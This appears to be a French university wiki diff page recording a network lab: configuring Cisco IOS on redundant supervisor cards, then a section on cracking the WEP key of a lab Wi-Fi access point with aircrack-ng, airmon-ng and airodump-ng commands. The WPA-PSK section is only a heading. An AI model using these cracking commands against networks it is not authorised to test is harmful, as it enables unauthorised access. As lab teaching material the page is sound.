TP sysres IMA2a5 2020/2021 G3 : Différence entre versions

De Wiki d'activités IMA
(Page créée avec « Problèmatique: Configuration et installation des iOS des cartes de supervision Etape 1: Vérifier l'existance d'OS sur les deux cartes. Pour cela, nous avons utilisé... »)
 
Ligne 18 : Ligne 18 :
 
Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur.  
 
Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur.  
  
boot
+
boot
sh ver  
+
sh ver  
  
 
Etape 4: Vérificaton de la redondance
 
Etape 4: Vérificaton de la redondance
Ligne 25 : Ligne 25 :
 
La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active
 
La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active
  
enable  
+
enable  
dir ?
+
dir ?
  
 
Nous visualisons les disk des deux cartes via la première. On peut voir la dénomination 'slave' comme préfixe des noms de répertoire
 
Nous visualisons les disk des deux cartes via la première. On peut voir la dénomination 'slave' comme préfixe des noms de répertoire
  
 
Remarque: Nous avons ajouté des modules présents sur l'ancien chassie. La carte principale de supervision les listes avec 'sh module'
 
Remarque: Nous avons ajouté des modules présents sur l'ancien chassie. La carte principale de supervision les listes avec 'sh module'
 +
 +
---------------------------------------------------------------------------------------------------------------------------------------------------
 +
== Cassage de clef WEP d’un point d’accès WiFi ==
 +
 +
Installation du logiciel:
 +
 +
<code> apt-get install aircrack-ng </code>
 +
 +
Trouver la carte wifi:
 +
 +
<code> ip l </code>
 +
 +
Démarrer la carte wifi avec le logiciel:
 +
 +
<code> airmon-ng start wlx40a5ef0s98al </code>
 +
 +
Le logiciel renome la denommination du périphérique. On peut le retrouver avec:
 +
 +
<code> airmon-ng </code>
 +
 +
Trouver le bssid de cracotte03:
 +
 +
<code> airodump-ng -c 9 wlan0mon </code>
 +
 +
-c correspond à la fréquence
 +
 +
On utilise le bssid pour filtrer et mettre les données dans un fichier:
 +
 +
  <code> airodump-ng -c 9 --bssid 04:DA:D2:9C:50:52 wlan0mon -w data </code>
 +
 +
Décriptage de la clé:
 +
 +
<code> aircrack-ng -b 04:DA:D2:9C:50:52 data*.cap </code>
 +
 +
 +
== Cassage de mot de passe WPA-PSK ==

Version du 4 novembre 2020 à 16:49

Problèmatique: Configuration et installation des iOS des cartes de supervision

Etape 1: Vérifier l'existance d'OS sur les deux cartes.


Pour cela, nous avons utilisé le port console grâce à une liaison série sur un PC. Ainsi, nous avons utilisé l'interface minicom pour nous connecter aux cartes.

-> 1ere carte: OS présent. Réaction suite à la commande boot et différents OS trouvés (3)
-> 2ème carte: OS absent 

Etape 2: Copie du fichier d'OS

Grâce à l'emplacement en façade pour les cartes flash, nous avons pu copier le fichier d'OS de la premiere carte de supervision vers l'autre. Puis, il nous a suffit de replacer la carte flash dans la deuxieme carte de supervision.

copy sup-bootdisk:/sys/s72033/base/s72033-ipservicesk9_wan-mz.&éé-33.SXI6.bin disk0:

Etape 3: Reboot de la deuxième carte

Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur.

boot
sh ver 

Etape 4: Vérificaton de la redondance

La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active

enable 
dir ?

Nous visualisons les disk des deux cartes via la première. On peut voir la dénomination 'slave' comme préfixe des noms de répertoire

Remarque: Nous avons ajouté des modules présents sur l'ancien chassie. La carte principale de supervision les listes avec 'sh module'


Cassage de clef WEP d’un point d’accès WiFi

Installation du logiciel:

 apt-get install aircrack-ng 

Trouver la carte wifi:

 ip l 

Démarrer la carte wifi avec le logiciel:

 airmon-ng start wlx40a5ef0s98al 

Le logiciel renome la denommination du périphérique. On peut le retrouver avec:

 airmon-ng 

Trouver le bssid de cracotte03:

 airodump-ng -c 9 wlan0mon 

-c correspond à la fréquence

On utilise le bssid pour filtrer et mettre les données dans un fichier:

  airodump-ng -c 9 --bssid 04:DA:D2:9C:50:52 wlan0mon -w data 

Décriptage de la clé:

 aircrack-ng -b 04:DA:D2:9C:50:52 data*.cap 


Cassage de mot de passe WPA-PSK